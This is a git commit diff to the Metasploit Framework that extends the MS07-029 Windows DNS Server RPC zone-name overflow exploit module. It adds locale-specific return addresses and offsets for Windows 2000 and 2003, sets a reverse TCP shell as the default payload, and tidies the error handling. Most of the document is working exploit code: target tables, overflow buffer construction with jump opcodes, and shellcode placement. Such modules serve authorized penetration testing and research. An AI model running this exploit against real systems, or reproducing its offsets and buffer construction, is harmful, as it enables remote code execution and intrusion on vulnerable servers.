Land #15918, add more targets for ms07_029_msdns_zonename
This commit is contained in:
commit
abb11cf896
|
@ -21,7 +21,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
'Author' =>
|
'Author' =>
|
||||||
[
|
[
|
||||||
'hdm', # initial module
|
'hdm', # initial module
|
||||||
'Unknown' # 2 unknown contributors (2003 support)
|
'Unknown', # 2 unknown contributors (2003 support)
|
||||||
|
'bcoles' # additional target offsets
|
||||||
],
|
],
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'References' =>
|
'References' =>
|
||||||
|
@ -33,7 +34,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
'Privileged' => true,
|
'Privileged' => true,
|
||||||
'DefaultOptions' =>
|
'DefaultOptions' =>
|
||||||
{
|
{
|
||||||
'EXITFUNC' => 'thread'
|
'EXITFUNC' => 'thread',
|
||||||
|
'PAYLOAD' => 'windows/shell/reverse_tcp'
|
||||||
},
|
},
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
{
|
{
|
||||||
|
@ -48,12 +50,22 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'Targets' =>
|
'Targets' =>
|
||||||
[
|
[
|
||||||
[ 'Automatic (2000 SP0-SP4, 2003 SP0, 2003 SP1-SP2)', { } ],
|
[ 'Automatic (2000 SP0-SP4, 2003 SP0-SP2)', { } ],
|
||||||
|
|
||||||
# WS2HELP.DLL
|
# p/p/r WS2HELP.DLL
|
||||||
[ 'Windows 2000 Server SP0-SP4+ English', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x75022ac4 } ],
|
[ 'Windows 2000 Server SP0-SP4+ English', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x75022ac4 } ],
|
||||||
[ 'Windows 2000 Server SP0-SP4+ Italian', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],
|
|
||||||
[ 'Windows 2000 Server SP0-SP4+ French', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
|
[ 'Windows 2000 Server SP0-SP4+ French', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
|
||||||
|
[ 'Windows 2000 Server SP0-SP4+ German', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74f92ac4 } ],
|
||||||
|
[ 'Windows 2000 Server SP0-SP4+ Italian', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],
|
||||||
|
[ 'Windows 2000 Server SP0-SP4+ Polish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fb2ac4 } ],
|
||||||
|
[ 'Windows 2000 Server SP0-SP4+ Portuguese', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],
|
||||||
|
[ 'Windows 2000 Server SP0-SP4+ Korean', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74f92ac4 } ],
|
||||||
|
[ 'Windows 2000 Server SP0-SP4+ Russian', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fb2ac4 } ],
|
||||||
|
[ 'Windows 2000 Server SP0-SP4+ Simplified Chinese', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
|
||||||
|
[ 'Windows 2000 Server SP0-SP4+ Spanish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],
|
||||||
|
[ 'Windows 2000 Server SP0-SP4+ Swedish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
|
||||||
|
[ 'Windows 2000 Server SP0-SP4+ Traditional Chinese', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
|
||||||
|
[ 'Windows 2000 Server SP0-SP4+ Turkish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fc2ac4 } ],
|
||||||
|
|
||||||
# Use the __except_handler3 method (and jmp esp in ATL.dll)
|
# Use the __except_handler3 method (and jmp esp in ATL.dll)
|
||||||
[ 'Windows 2003 Server SP0 English', { 'OS' => '2003SP0', 'Off' => 1593, 'Rets' => [0x77f45a34, 0x77f7e7f0, 0x76a935bf] } ],
|
[ 'Windows 2003 Server SP0 English', { 'OS' => '2003SP0', 'Off' => 1593, 'Rets' => [0x77f45a34, 0x77f7e7f0, 0x76a935bf] } ],
|
||||||
|
@ -65,7 +77,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
[ 'Windows 2003 Server SP1-SP2 Spanish', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a30000 } ],
|
[ 'Windows 2003 Server SP1-SP2 Spanish', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a30000 } ],
|
||||||
[ 'Windows 2003 Server SP1-SP2 Italian', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ],
|
[ 'Windows 2003 Server SP1-SP2 Italian', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ],
|
||||||
[ 'Windows 2003 Server SP1-SP2 German', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ],
|
[ 'Windows 2003 Server SP1-SP2 German', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ],
|
||||||
|
[ 'Windows 2003 Server SP1-SP2 Russian', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x769a0000 } ],
|
||||||
|
[ 'Windows 2003 Server SP1-SP2 Simplified Chinese', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x769c0000 } ],
|
||||||
],
|
],
|
||||||
'DisclosureDate' => '2007-04-12',
|
'DisclosureDate' => '2007-04-12',
|
||||||
'DefaultTarget' => 0 ))
|
'DefaultTarget' => 0 ))
|
||||||
|
@ -138,8 +151,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
if (not mytarget)
|
if (not mytarget)
|
||||||
print_error("There is no available target for this locale")
|
fail_with(Failure::NoTarget, "There is no available target for '#{datastore['LOCALE']}' locale")
|
||||||
return
|
|
||||||
end
|
end
|
||||||
else
|
else
|
||||||
mytarget = target
|
mytarget = target
|
||||||
|
@ -149,7 +161,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
|
|
||||||
# Connect to the high RPC port
|
# Connect to the high RPC port
|
||||||
connect(true, { 'RPORT' => dport })
|
connect(true, { 'RPORT' => dport })
|
||||||
print_status("Trying target #{target.name}...")
|
print_status("Trying target #{mytarget.name}...")
|
||||||
|
|
||||||
# Bind to the service
|
# Bind to the service
|
||||||
handle = dcerpc_handle('50abc2a4-574d-40b3-9d66-ee4fd5fba076', '5.0', 'ncacn_ip_tcp', [datastore['RPORT']])
|
handle = dcerpc_handle('50abc2a4-574d-40b3-9d66-ee4fd5fba076', '5.0', 'ncacn_ip_tcp', [datastore['RPORT']])
|
||||||
|
@ -160,18 +172,18 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
# Create our buffer with our shellcode first
|
# Create our buffer with our shellcode first
|
||||||
txt = Rex::Text.rand_text_alphanumeric(8192)
|
txt = Rex::Text.rand_text_alphanumeric(8192)
|
||||||
|
|
||||||
if (target['OS'] =~ /2000/)
|
if (mytarget['OS'] =~ /2000/)
|
||||||
txt[0, payload.encoded.length] = payload.encoded
|
txt[0, payload.encoded.length] = payload.encoded
|
||||||
|
|
||||||
off = target['Off']
|
off = mytarget['Off']
|
||||||
txt[ off ] = [mytarget.ret].pack('V')
|
txt[ off ] = [mytarget.ret].pack('V')
|
||||||
txt[ off - 4, 2] = "\xeb\x06"
|
txt[ off - 4, 2] = "\xeb\x06"
|
||||||
txt[ off + 4, 5] = "\xe9" + [ (off+9) * -1 ].pack('V')
|
txt[ off + 4, 5] = "\xe9" + [ (off+9) * -1 ].pack('V')
|
||||||
|
|
||||||
elsif (target['OS'] =~ /2003SP0/)
|
elsif (mytarget['OS'] =~ /2003SP0/)
|
||||||
txt[0, payload.encoded.length] = payload.encoded
|
txt[0, payload.encoded.length] = payload.encoded
|
||||||
|
|
||||||
off = target['Off']
|
off = mytarget['Off']
|
||||||
txt[ off ] = [mytarget['Rets'][0]].pack('V') # __except_handler3
|
txt[ off ] = [mytarget['Rets'][0]].pack('V') # __except_handler3
|
||||||
txt[ off - 4, 2] = "\xeb\x16"
|
txt[ off - 4, 2] = "\xeb\x16"
|
||||||
|
|
||||||
|
|
|
@ -25,7 +25,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
'Author' =>
|
'Author' =>
|
||||||
[
|
[
|
||||||
'hdm', # initial module
|
'hdm', # initial module
|
||||||
'Unknown' # 2 unknown contributors (2003 support)
|
'Unknown', # 2 unknown contributors (2003 support)
|
||||||
|
'bcoles' # additional target offsets
|
||||||
],
|
],
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'References' =>
|
'References' =>
|
||||||
|
@ -37,7 +38,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
'Privileged' => true,
|
'Privileged' => true,
|
||||||
'DefaultOptions' =>
|
'DefaultOptions' =>
|
||||||
{
|
{
|
||||||
'EXITFUNC' => 'thread'
|
'EXITFUNC' => 'thread',
|
||||||
|
'PAYLOAD' => 'windows/shell/reverse_tcp'
|
||||||
},
|
},
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
{
|
{
|
||||||
|
@ -52,25 +54,35 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'Targets' =>
|
'Targets' =>
|
||||||
[
|
[
|
||||||
[ 'Automatic (2000 SP0-SP4, 2003 SP0, 2003 SP1-SP2)', { } ],
|
[ 'Automatic (2000 SP0-SP4, 2003 SP0-SP2)', { } ],
|
||||||
|
|
||||||
# WS2HELP.DLL
|
# p/p/r WS2HELP.DLL
|
||||||
[ 'Windows 2000 Server SP0-SP4+ English', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x75022ac4 } ],
|
[ 'Windows 2000 Server SP0-SP4+ English', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x75022ac4 } ],
|
||||||
[ 'Windows 2000 Server SP0-SP4+ Italian', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],
|
|
||||||
[ 'Windows 2000 Server SP0-SP4+ French', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
|
[ 'Windows 2000 Server SP0-SP4+ French', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
|
||||||
|
[ 'Windows 2000 Server SP0-SP4+ German', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74f92ac4 } ],
|
||||||
|
[ 'Windows 2000 Server SP0-SP4+ Italian', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],
|
||||||
|
[ 'Windows 2000 Server SP0-SP4+ Polish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fb2ac4 } ],
|
||||||
|
[ 'Windows 2000 Server SP0-SP4+ Portuguese', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],
|
||||||
|
[ 'Windows 2000 Server SP0-SP4+ Korean', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74f92ac4 } ],
|
||||||
|
[ 'Windows 2000 Server SP0-SP4+ Russian', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fb2ac4 } ],
|
||||||
|
[ 'Windows 2000 Server SP0-SP4+ Simplified Chinese', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
|
||||||
|
[ 'Windows 2000 Server SP0-SP4+ Spanish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],
|
||||||
|
[ 'Windows 2000 Server SP0-SP4+ Swedish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
|
||||||
|
[ 'Windows 2000 Server SP0-SP4+ Traditional Chinese', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
|
||||||
|
[ 'Windows 2000 Server SP0-SP4+ Turkish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fc2ac4 } ],
|
||||||
|
|
||||||
# Use the __except_handler3 method (and jmp esp in ATL.dll)
|
# Use the __except_handler3 method (and jmp esp in ATL.dll)
|
||||||
[ 'Windows 2003 Server SP0 English', { 'OS' => '2003SP0', 'Off' => 1593, 'Rets' => [0x77f45a34, 0x77f7e7f0, 0x76a935bf] } ],
|
[ 'Windows 2003 Server SP0 English', { 'OS' => '2003SP0', 'Off' => 1593, 'Rets' => [0x77f45a34, 0x77f7e7f0, 0x76a935bf] } ],
|
||||||
[ 'Windows 2003 Server SP0 French', { 'OS' => '2003SP0', 'Off' => 1593, 'Rets' => [0x77f35a34, 0x77f6e7f0, 0x76a435bf] } ],
|
[ 'Windows 2003 Server SP0 French', { 'OS' => '2003SP0', 'Off' => 1593, 'Rets' => [0x77f35a34, 0x77f6e7f0, 0x76a435bf] } ],
|
||||||
|
|
||||||
|
|
||||||
# ATL.DLL (bypass DEP/NX, IB -> Image Base of ATL.dll)
|
# ATL.DLL (bypass DEP/NX, IB -> Image Base of ATL.dll)
|
||||||
[ 'Windows 2003 Server SP1-SP2 English', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a80000 } ],
|
[ 'Windows 2003 Server SP1-SP2 English', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a80000 } ],
|
||||||
[ 'Windows 2003 Server SP1-SP2 French', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a30000 } ],
|
[ 'Windows 2003 Server SP1-SP2 French', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a30000 } ],
|
||||||
[ 'Windows 2003 Server SP1-SP2 Spanish', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a30000 } ],
|
[ 'Windows 2003 Server SP1-SP2 Spanish', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a30000 } ],
|
||||||
[ 'Windows 2003 Server SP1-SP2 Italian', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ],
|
[ 'Windows 2003 Server SP1-SP2 Italian', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ],
|
||||||
[ 'Windows 2003 Server SP1-SP2 German', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ],
|
[ 'Windows 2003 Server SP1-SP2 German', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ],
|
||||||
|
[ 'Windows 2003 Server SP1-SP2 Russian', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x769a0000 } ],
|
||||||
|
[ 'Windows 2003 Server SP1-SP2 Simplified Chinese', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x769c0000 } ],
|
||||||
],
|
],
|
||||||
'DisclosureDate' => '2007-04-12',
|
'DisclosureDate' => '2007-04-12',
|
||||||
'DefaultTarget' => 0 ))
|
'DefaultTarget' => 0 ))
|
||||||
|
@ -124,14 +136,12 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
print_status("Detected a Windows 2003 SP#{$2} target...")
|
print_status("Detected a Windows 2003 SP#{$2} target...")
|
||||||
target = gettarget('2003SP12')
|
target = gettarget('2003SP12')
|
||||||
else
|
else
|
||||||
print_status("Unknown OS: #{smb_peer_os}")
|
fail_with(Failure::NoTarget, "No target for OS: #{smb_peer_os}")
|
||||||
return
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
if (not target)
|
if (not target)
|
||||||
print_status("There is no available target for this OS locale")
|
fail_with(Failure::NoTarget, "There is no available target for '#{datastore['LOCALE']}' locale")
|
||||||
return
|
|
||||||
end
|
end
|
||||||
|
|
||||||
print_status("Trying target #{target.name}...")
|
print_status("Trying target #{target.name}...")
|
||||||
|
|
Loading…
Reference in New Issue